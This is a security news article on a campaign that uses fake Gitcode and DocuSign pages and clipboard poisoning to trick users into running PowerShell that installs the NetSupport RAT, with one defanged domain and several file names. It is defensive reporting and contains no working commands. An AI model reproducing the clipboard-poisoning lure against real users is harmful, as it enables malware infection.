A sophisticated campaign is using fake websites to trick users into executing malicious PowerShell scripts, ultimately infecting their systems with the NetSupport Remote Access Trojan (RAT).
Researchers from the DomainTools Investigations (DTI) team said that the malicious scripts are hosted on fake sites impersonating popular services such as Gitcode and DocuSign. The lure sites prompt users to run a PowerShell command via the Windows Run dialog, initiating a multi-stage infection chain.
The initial script downloads another PowerShell downloader, which then retrieves additional payloads and installs the NetSupport RAT, the researchers explained.
Some of the fake DocuSign pages deploy a deceptive CAPTCHA verification process. When users complete the check, a technique known as clipboard poisoning secretly copies a hidden PowerShell command to their clipboard. They are then instructed to paste it into the Run window, unknowingly executing the malware.
The campaign appears to rely heavily on social engineering tactics via email and social media to draw victims to the malicious domains, such as docusign.sa[.]com. The PowerShell scripts downloaded from the sites establish persistence through a file named wbdims.exe, likely hosted on GitHub, though it was unavailable at the time of analysis.
Further stages of the attack involve fetching additional scripts and payloads from the spoofed DocuSign domain, resulting in the download and execution of jp2launcher.exe, which deploys the NetSupport RAT.
While it’s unclear what threat actor is behind the campaign, researchers noted similarities in infrastructure and tactics with the SocGholish (FakeUpdates) malware campaign observed in late 2024. Furthermore, NetSupport Manager, though a legitimate remote administration tool, has frequently been co-opted by threat actors including FIN7, Scarlet Goldfinch, and Storm-0408 for malicious purposes.
